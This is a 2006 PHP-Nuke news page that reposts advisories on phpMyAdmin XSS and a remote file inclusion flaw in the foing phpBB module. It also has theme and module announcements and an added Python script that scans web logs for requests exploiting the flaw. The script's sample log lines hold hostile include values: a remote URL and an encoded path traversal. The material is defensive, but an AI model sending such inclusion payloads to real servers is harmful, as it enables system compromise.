DESCRIPTION:
Two vulnerabilities have been reported in phpMyAdmin, which can be exploited by malicious people to conduct cross-site scripting attacks.
1) Input passed to the "theme" parameter isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerability has been reported in versions prior to 2.8.0.4 for the 2.8.0 branch.
2) Input passed to the "db" parameter isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerability has been reported in some versions prior to 2.8.0.4.
SOLUTION: Update to version 2.8.0.4.
http://www.phpmyadmin.net/home_page/downloads.php
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) The vendor credits Sven Vetsch/Disenchant.
ORIGINAL ADVISORY:
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2006-2
Posted by Raven on Monday, May 15, 2006 @ 09:04:05 EDT (456 reads) (Score: 0)
DESCRIPTION:
Kurdish Security has discovered some vulnerabilities in the foing module for phpBB, which can be exploited by malicious people to compromise a vulnerable system.
Input passed to the "phpbb_root_path" parameter in index.php, song.php, faq.php, list.php, gen_m3u.php, and playlist.php isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from external and local resources.
The vulnerabilities have been confirmed in version 0.7.0 and have also been reported in versions 0.6.0, 0.5.0, 0.4.0, 0.3.0, and 0.2.0. Other versions may also be affected.
SOLUTION: Edit the source code to ensure that input is properly verified.
Use another product.
PROVIDED AND/OR DISCOVERED BY: Kurdish Security
ORIGINAL ADVISORY:
http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html
Posted by Raven on Monday, May 15, 2006 @ 08:57:44 EDT (647 reads) (Score: 5)
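For the foing advisory above, an added detection example (not part of the advisory or of the module's code): it scans web access logs for requests to the six named scripts that carry a client-supplied "phpbb_root_path". It assumes Common Log Format, that legitimate requests never send this parameter, and a constructed `/forum/` install path; the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script names and parameter name are taken from the advisory text.
AFFECTED = {"index.php", "song.php", "faq.php", "list.php",
            "gen_m3u.php", "playlist.php"}
PARAM = "phpbb_root_path"

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

def classify(value):
    """Label what a client-supplied include root points at."""
    v = unquote(value).strip().lower()   # extra decode catches double encoding
    if re.match(r"[a-z][a-z0-9+.-]*://", v) or v.startswith("//"):
        return "remote"                  # URL-style value: external resource
    if ".." in v or v.startswith("/") or "\x00" in v:
        return "local"                   # traversal, absolute path or NUL byte
    return "override"                    # harmless-looking, but still client-set

def scan(lines):
    """Return (line_no, client, script, kind, status) per suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        script = parts.path.rsplit("/", 1)[-1].lower()
        if script not in AFFECTED:
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key.lower() == PARAM:
                findings.append((line_no, client, script,
                                 classify(value), int(status)))
    return findings

# Constructed sample log lines (not real traffic); /forum/ is an assumed path.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/May/2006:08:01:12 -0400] "GET /forum/song.php?phpbb_root_path=http://example.invalid/a.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/May/2006:08:02:40 -0400] "GET /forum/playlist.php?id=3&phpbb_root_path=..%2F..%2Ftmp%2F HTTP/1.1" 200 734',
    '192.0.2.33 - - [15/May/2006:08:03:05 -0400] "GET /forum/faq.php?mode=rules HTTP/1.1" 200 2048',
    '192.0.2.33 - - [15/May/2006:08:03:09 -0400] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 4096',
    '192.0.2.44 - - [15/May/2006:08:04:51 -0400] "GET /forum/list.php?phpbb_root_path=./ HTTP/1.0" 404 210',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only query strings are inspected, since POST bodies do not appear in access logs; a 200 status on a "remote" or "local" hit is the one to triage first.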
Content Plus 1.0.0 Released, Get Your Copy Now!
slaytanic_wehrmacht writes "Content Plus is a mega enhanced version of PHP-Nuke's default Content Module; it has a lot of new features and also more eye-candy.
Features:
- Users can add new pages.
- Ability to export content as PDF
- Users can share page with friends.
- Users can get a printer friendly page.
- Improved the eye-candy.
Get your copy Right Now!"
Posted by Raven on Monday, May 15, 2006 @ 01:18:18 EDT (777 reads) (Score: 3)
My opinion of the Nuke Community
pcnuke writes "My opinion of the Nuke Community (www.pcnuke.com):
Date: 05.14.06
One thing the team at PCN Systems has found out working with the PHP-Nuke portal system (in our short time within the community) is that it will never be up to date & can have many security issues. While members & staff of this website enjoy using phpnuke and variations of the program, part of the fun of it is messing with it, and converting sections of it the way you want it to be. The main thing you must remember is that it's a free program and is Open Source, so you can distribute it, and change it, and any addons created for it, any way you would like. Many people will use it as BASIS to develop a new FORK from, converting areas of the code the way they choose. We want everyone here at www.pcnuke.com to know that versions found on our website are not FORKS, they are truly php-nuke based at heart, and any addon created for phpnuke will always work with all systems found on this website.
The main reason for the program's flaws are caused from its developer and bad coding he releases to the public. While the overall idea of the system is great and I mean no disrespect to the developer of PHP-Nuke (FB) www.phpnuke.org , the program could be made better by its dev... by rechecking its operations in a couple of browsers, prior to releasing it to the public. Remember Php-Nuke is also a fork created from a previous open source portal system."
Posted by Raven on Monday, May 15, 2006 @ 01:16:40 EDT (1117 reads) (Score: 0)
New Themes from DesignWicked and Phpcusa
refiner writes "Themes PH-APOTHUS BLUE AND PH-APOTHUS RED have been released today, both themes are tech looking and come with matching forum, flash nav in the header (links can be changed thru the text file nav.txt) second flash menu in the footer, scrolling download and weblink, forum header with flash nav. You can see both themes and all other Phpcusa & DesignWicked themes at newly opened phpcusa themes site Phpcusa & DesignWicked Themes. PHAPOTHUS BLUE is named PH-APOTHUSB. PHAPOTHUS RED is named PH-APOTHUSR."
Posted by Raven on Monday, May 15, 2006 @ 01:09:51 EDT (386 reads) (Score: 0)
Myheadlines v 4.3.2 Release Candidate 1: the great syndicated news-engine
nukeevangelist writes "good news from jmagar.com - celebrate the long development of the MyHeadlines module [change-log]
travel to the developer site jmagar.com and read good news about Myheadlines v 4.3.2 Release Candidate 1
Mike Agar: "I'm now testing the latest version of MyHeadlines. There are so many changes and improvements that I want to work out the kinks before going public with it. Also the jokers at SourceForge are having difficulty with the CVS servers so I can't commit my changes, and thus am unable to make a proper release. Not to worry, in about 2 weeks we'll make this public, and I'll even include my latest source tree in OPML Format!"
at the developer site you can see the long change-log"
Posted by Raven on Saturday, May 13, 2006 @ 22:52:06 EDT (395 reads) (Score: 0)
BlueOcean FREE PHPNuke theme released by SDDesign.biz
Slashdot writes "Hello.
We have just released our newest FREE PHP Nuke Theme - "BlueOcean".
As the name suggests the theme is based on various shades of blue. This is
unlike any of our previous productions because it doesn't have the glamour or
the flash flickers in it.
The theme is based on simplicity and is clean & elegant.
The theme comes with Header source files in .psd format. Also included the
forum icons and buttons source files.
We will soon be releasing a few more themes of the similar category.
Thank you"
Posted by Raven on Saturday, May 13, 2006 @ 22:51:12 EDT (813 reads) (Score: 0)
Pc-Nuke! releases updated version of Xtreme! and...
pcnuke writes "Pc-Nuke! welcomes everyone to the latest release of the Xtreme! portal system. PCN-Xtreme! is based from PHP-Nuke by phpnuke.org and is over 25% smaller in size than the previous issue. These releases are built on our revised v7.9, with Patched Series 3.1 (official chatserv) and BBtoNuke v2.0.20 applied, and added features and security!
PCN-Xtreme! incorporates numerous upgrades from various developers which are listed in the MENU/VERSIONS link in our menu on the left-side column, plus you can link to a DEMO site on our frontpage. Some of the contents included are: PCN Advertising System, V3 Arcade, MultiPlex Center, Staff, Donations, Photo Gallery, Downloads, Reviews, Web Links, Topics, Work Board, Webstats, Events Calendar, Shoutbox, Your Account, phpBB 2.0.20 forum, Forum Ranks, Rules, Legal Docs, Contact Plus, Admin Email Lists, Ban Request, Games Room, Center HTMLs, Scrollers, News Feeds, over 80+ blocks and much more. We've also incorporated into PCN-Xtreme! v7.9.031d our Blacky & Gunpowder, among other themes and a large amount of useful items."
Posted by Raven on Saturday, May 13, 2006 @ 22:49:16 EDT (882 reads) (Score: 0)
Important Change!!
If you are running NukeSentinel(tm) and you haven't noticed, IANA has started releasing many of the formerly Reserved ranges. To help you not block real people (including me) from visiting your sites, run the following queries on your database to clear the released ranges:
Posted by BobMarion on Saturday, May 13, 2006 @ 03:30:42 EDT (1386 reads) (Score: 5)
Nuke Royal - E-Solution
Guardian2003 writes "As some of you may be aware, when NukeRoyal/E-Solution first came out I was available on the author's site to answer support questions and generally 'help out'.
Over the last few months I have had numerous emails, private messages and seen numerous complaints on the author's support forum etc which contained information that causes me concern."
Posted by Raven on Thursday, May 11, 2006 @ 09:30:41 EDT (1569 reads) (Score: 5)